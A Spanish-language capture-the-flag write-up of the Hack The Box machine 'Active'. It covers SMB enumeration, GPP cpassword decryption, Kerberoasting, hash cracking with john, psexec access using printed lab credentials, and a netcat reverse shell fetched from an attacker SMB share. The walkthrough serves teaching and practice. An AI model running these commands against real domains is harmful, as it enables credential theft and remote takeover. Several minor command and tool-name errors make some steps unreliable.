# Active
En esta publicación, abordaremos la máquina "Active" de la plataforma Hack The Box. Iniciaremos con la enumeración de recursos compartidos a través del protocolo SMB, lo que nos permitirá obtener el archivo `Groups.xml`. Dentro de este archivo, encontraremos una contraseña que podremos descifrar, ya que la clave de cifrado es conocida públicamente. Finalmente, realizaremos un ataque de Kerberoasting para obtener un hash TGS de Kerberos, que podremos crackear para obtener la contraseña del usuario Administrador. ## Reconocimiento Iniciamos lanzando una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

Reconocimiento utilizando el comando ping

Vemos que responde al envío de nuestro paquete, verificando de esta manera que tenemos conectividad. Por otra parte, confirmamos que estamos frente a una máquina Windows basandonos en el TTL (Time To Live) 127. ## Enumeración ### Enumeración de versión y servicio Lanzamos una serie de script básicos de enumeración propios de `nmap`, para conocer la versión y servicio que esta corriendo bajo los puertos abiertos. ```bash nmap -sS -sCV -p- --open --min-rate 5000 10.10.10.100 -n -Pn -oN targeted -vvv ```

Descubrimiento de versión y servicio con nmap

Antes de comenzar a enumerar, ingresamos en nuestro archivo `/etc/hosts` la siguiente linea para que cuando hagmos referencia `active.htb` resuelva a la IP `10.10.10.100`. ```bash echo '10.10.10.100 active.htb' >> /etc/hosts ``` ### Enumeración de recursos compartidos Comenzamos enumerando recursos compartidos através del protocolo SMB utilizando una Null Session. Podemos observar, que tenemos permisos de lectura al recurso compartido `Replication`. ```basic nxc smb 10.10.10.100 -u '' -p '' --shares ```

Enumeración de recursos compartidos con netexec

También podemos enumerar utilizando otras herramientas como `smbmap`. ```bash smbmap -u '' -p '' -H 10.10.10.100 ```

Enumeración de recursos compartidos con smbmap

Enumeramos de forma recursiva el recurso `Replication`. ```bash smbmap -u '' -p '' -H 10.10.10.100 -r 'Replication' ```

Enumeración del recurso compartido Replication

Observamos que dentro existe un directorio llamado `active.htb`. Continuamos enumerando y nos encontramos con tres subdirectorios. ```bash smbmap -u '' -p '' -H 10.10.10.100 -r 'Replication/active.htb' ```

Enumeración del recurso compartido Replication

Si seguimos enumerando, nos encontramos con un archivo llamdo `Groups.xml`. ```bash smbmap -u '' -p '' -H 10.10.10.100 -r 'Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/' ```

Groups.xml

Descargamos este archivo a nuestra máquina utilizando `sqlmap`. ```bash smbmap -u '' -p '' -H 10.10.10.100 --download 'Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml' ```

Groups.xml

Renombramos el archivo a `Groups.xml` para mayor facilidad. ``` mv 10.10.10.100-Replication_active.htb_Policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml Groups.xml ```

Groups.xml

## Explotación ### Archivo Groups.xml de Active Directory El archivo `Groups.xml` es parte de la política de preferencias de grupo (GPP) en Active Directory. Este archivo se utiliza para configurar y administrar los grupos locales en los equipos dentro de un dominio de Active Directory. Las políticas de preferencias de grupo permiten a los administradores establecer configuraciones y preferencias de manera centralizada que se aplican a los usuarios y equipos. Dentro de `Groups.xml`, se pueden especificar acciones como crear, modificar o eliminar cuentas de usuarios locales y grupos en los equipos del dominio. El archivo está ubicado generalmente en la ruta: ```powershell \\\SYSVOL\\Policies\{}\Machine\Preferences\Groups\Groups.xml ``` Este archivo contiene la configuración específica para los grupos, incluyendo nombres de usuarios, grupos, contraseñas y otros parámetros. ### Campo `cpassword` El campo `cpassword` dentro del archivo `Groups.xml` contiene la contraseña encriptada para las cuentas de usuario configuradas a través de las preferencias de grupo. La encriptación utilizada para este campo es bastante débil y utiliza una clave estática conocida. La contraseña se encripta usando AES-256, pero la clave de cifrado está embebida en las herramientas de administración de GPP y es conocida públicamente. Para crackear el `cpassword`, podemos utilizar la herramienta [gpp-decrypt](https://github.com/t0thkr1s/gpp-decrypt). ```bash gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ```

Crackeamos el cpassword utilizando la herramienta gpp-decrypt

Validamos las credenciales contra el dominio utilizando`netexec`.

Validamos las credenciales contra el dominio utilizando netexec.

### Kerberoasting Ahora que tenemos credenciales validas del dominio, podemos intentar realizar un ataque de Kerberoasting. Además, si miramos el nombre del usuario vemos que el sufijo del mismo nos da a entender que este puede solicitar TGS (Ticket Granting Service) de Kerberos, para lo cual podemos hacer lo siguiente utilizando la herramienta `impacket-GetUserSPNs`: ```bash impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -outputfile krb.txt ```

TGS

Ahora, podemos hacer uso de `john` o `hashcat` para crackear el hash y obtener la contraseña en texto claro. ```bash john krb_tgs.txt --wordlist=/usr/share/wordlists/rockyou.txt ```

Cracking Kerberos Ticket TGS con john

Validamos las credenciales contra el dominio.

Validamos las credenciales con netexec

Genial, nos indica que son validas y además **Pwn3d!**, lo cual nos permite conectarnos a la máquina usando `psexec`. Nos conectamos a la máquina víctima. ```bash impacket-psexec Administrator:Ticketmaster1968@10.10.10.100 ```
Para tener una consola más interactiva, nos compartimos el binario de `nc.exe` con un recurso compartido desde nuestra máquina utilizando `impacket-smbserver`: Creamos un recurso compartido ```bash impacket-smbserver -smb2support sharedFolder . ``` Decargamos el binario de netcat. ``` copy \\10.10.14.3\sharedFolder\nc.exe . ``` Nos ponemos en escucha con netcat por el puerto 443. ```bash rlwrap nc -lnvp 443 ``` Enviamos la reverse shell ``` nc.exe -e cmd 10.10.10.100 -443 ``` Ganamos acceso al sistema.

Ganamos acceso a la máquina víctima

De esta forma, ya podemos leer las flags de `user.txt` y `root.txt`.

Flags

Concluimos la resolución de una nueva máquina. Espero que hayas disfrutado del contenido y que los conceptos hayan quedado claros. ¡Gracias por leer! Happy Hacking!